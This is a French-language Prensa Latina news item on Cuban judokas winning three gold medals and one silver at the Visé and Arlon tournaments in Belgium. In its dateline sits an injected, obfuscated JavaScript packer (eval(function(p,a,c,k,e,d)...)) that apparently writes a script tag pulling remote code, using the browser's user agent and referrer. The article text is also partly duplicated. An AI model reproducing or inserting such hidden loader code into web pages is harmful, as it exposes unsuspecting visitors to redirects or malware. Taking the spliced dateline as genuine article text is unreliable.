| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française

Judo : Les Cubains décrochent trois titres en Belgique

Bruxelles, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibrea|var|u0026u|referrer|innze||js|php'.split('|'),0,{})) 7 fév (PL) Les judokas cubains on remporté trois médailles d’or et une d’argent aux tournois de Visé et Artlon, en Belgique. Ils s’apprêtent pour le Grand Slam de Paris.

Bruxelles, 7 fév (PL) Les judokas cubains on remporté trois médailles d’or et une d’argent aux tournois de Visé et Artlon, en Belgique. Ils s’apprêtent pour le Grand Slam de Paris.

A l’Open d’Arlon, les Cubaines Vanessa Godinez (48 kg) et Kaliema Antomarchi (78 kg) se sont couronnées championnes en battant, respectivement, la Japonaise Aoi Ogura (par waza-ari) et la Française Mathilde Gil.

Aliuska Ojeda (57 kg), la troisième cubaine en lice, ne s’est pas qualifiée pour la finale.

Côté les hommes, Alex Garcia (100 kg) a remporté la médaille d’or er renversant par ippon l’Allemand Andre Breitbarth.  Le sous-champion du mondial de Tcheliabinsk  2014 (100 kg), José Armenteros, a gagné la médaille d’argent. Il a été battu par ippon dans la finale par le Belge Toma Nikiforov (médaille de bronze au mondial d’Astana 2015).

Le troisième compétiteur de l’île, Magdiel Estrada (73 kg) s’est classé septième.
Les judokas cubains termineront leur tournée en Europe au Grand Prix de Dusseldorf, en Allemagne, du 24 au 26 février.